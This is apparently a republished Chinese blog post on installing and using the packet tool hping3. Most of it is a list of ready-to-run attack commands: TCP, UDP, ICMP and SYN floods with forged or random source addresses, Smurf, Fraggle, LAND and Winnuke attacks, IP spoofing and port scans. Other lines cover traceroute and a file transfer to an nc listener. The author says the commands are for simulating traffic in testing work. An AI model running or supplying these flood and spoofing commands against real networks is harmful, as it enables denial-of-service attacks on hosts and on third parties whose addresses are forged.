暂无图片
暂无图片
暂无图片
暂无图片
暂无图片

hping 命令使用小结

3255

写在之前


本篇只是在工作中,需要模拟一些网络包的状态时,使用hping3命令可以很好的模拟,注意请不要用于非法用途,现在是法治社会哦。


安装


1. 安装依赖包

yum -y install libpcap-devel tcl-devel

检查:libpcap及libpcap-devel是否存在,不存在就安装,安装后就做个连接:ln -sf usr/include/pcap-bpf.h usr/include/net/bpf.h 否则在编译阶段会报错如下:

  libpcap_stuff.c:19:21: fatal error: net/bpf.h: No such file or directory


2. 从github上clone源代码

git clone https://github.com/antirez/hping.git


3. 编译安装

cd hping
./configure
make
make install


常用方式


1. 向目标发送数据包,比如发送两个数据包

hping3 -c 2 192.168.0.2hping3 -c 2 192.168.0.2


2. TCP 洪水攻击 

hping3 -SARUPF -p 80 –flood –rand-source 192.168.100.1
hping3 --flood 192.168.0.2


3. ICMP 洪水攻击 

hping3 --flood 192.168.0.2 -1
hping3 -q -n -d 200 –icmp –flood -a 11.11.11.11 192.168.100.1

-q安静模式 -n不解析域名 -a指定伪造IP


4. UDP 洪水攻击

hping3 --flood 192.168.0.2 -2
hping3 –udp -s 6666 -p 53 -a 8.8.8.8 –flood 192.168.100.1


5. SYN 洪水攻击 

hping3 --flood 192.168.0.2 -S
hping3 -c 1000 -d 120 -S -p 80 –flood –rand-source 192.168.100.1

-c 指定连接数 -p 目标端口

-d 指定数据部分的大小 -S 攻击类型是Syn flood

–flood 以泛洪的方式攻击 –rand-source 随机产生伪造源地址


hping3 -S -P -U -p 80 –flood –rand-source 192.168.100.1

-P flag置为Push -U flag置为Urge紧急

加这两参数可以提高效率


6. Winnuke攻击 

hping3 -U 192.168.0.2 -p 139

winnuke 攻击的端口不仅是139 端口,还有“138、137、113、53”等端口


7. 端口扫描

hping3 -8 all -S 192.168.0.2
hping3 -8 1-1024 -S 192.168.0.2

注意:-S是利用SYN包进行扫描,也可以使用-2 UDP形式进行扫描,-8是端口扫描模式,all是扫描所有的端口,如果扫描指定的端口的话,可以使用-来连接;


8. IP 地址欺骗攻击

hping3 -a 111.111.111.111 192.168.0.2

-a 参数后接着的地址为需要隐藏的源地址,


9. IP分片

hping3 192.168.0.2 -S -p 80 -f


10. Smurf 或者 Fraggle攻击 

注意smurf攻击有两种,一种是简单的发送信息到被攻击地址的广播地址,如:

hping3 -1 192.168.0.255


第二种是复杂点的攻击,即伪装成被攻击的地址发送信息到被攻击地址的广播地址,如:

hping3 -1 -a 192.168.0.1 192.168.0.255


Fraggle攻击即由smurf的ICMP协议的攻击改为由UDP协议的攻击,因此只需要修改一个参数即可,

将“-1” 改为“-2” (我们UTM实现的是典型端口7模式即hping3 -2 192.168.0.255 -p 7)


11. LAND 攻击

hping3 -S -a 192.168.0.2 -p 21 192.168.0.2
hping3 -n -S -p 80 -a 192.168.100.1 –flood 192.168.100.1

Land攻击即是伪装成被攻击地址发送请求信息给被攻击地址本身 


12. TCP选项异常

(1) SYN 包被分片
# hping3 -S 192.168.0.2 -f

(2) TCP 包仅设置了FIN flag
# hping3 -F 192.168.0.2

(3) TCP包没有设置任何flag
# hping3 192.168.0.2

(4) TCP包的FIN和RST flag同时被设置
# hping3 -F -R 192.168.0.2

(5) TCP包的SYN和URG flag同时被设置
# hping3 -S -U 192.168.0.2

(6)TCP包的SYN和RST flag同时被设置
# hping3 -S -R 192.168.0.2

(7)TCP包的SYN和FIN flag同时被设置
# hping3 -S -F 192.168.0.2


13. 数据包跟踪

hping3 –traceroute -V -1 www.baidu.com

类似于traceroute www.baidu.com;


14. 文件互传

发送端:

hping3 -2 -p 1373 192.168.100.102 -d 100 -E test.txt

-2 UDP模式 -p端口

-d 数据大小 -E 文件名


接收端:

nc -lp 1373 -u -w 5 > recv.txt && cat recv.txt

-l 监听模式 -p 端口

-w 超时时间 -u UDP模式


您的关注是我写作的动力




安装使用类


tcpdump 使用小结

Centos7.6内核升级

Centos 7 升级 Python 与 Yum 修改

Centos 7 安装 Redis 5.0.8 单实例

CentOS 7 下 yum 安装 MySQL 5.7 最简教程

kubernetes中部署 nacos,使用外部MySQL存储

你真的了解客户端请求如何到达服务器端的吗


专辑分享


kubeadm使用外部etcd部署kubernetes v1.17.3 高可用集群

第一篇  使用 Prometheus 监控 Kubernetes 集群理论篇



文章转载自Linux点滴运维实践,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

评论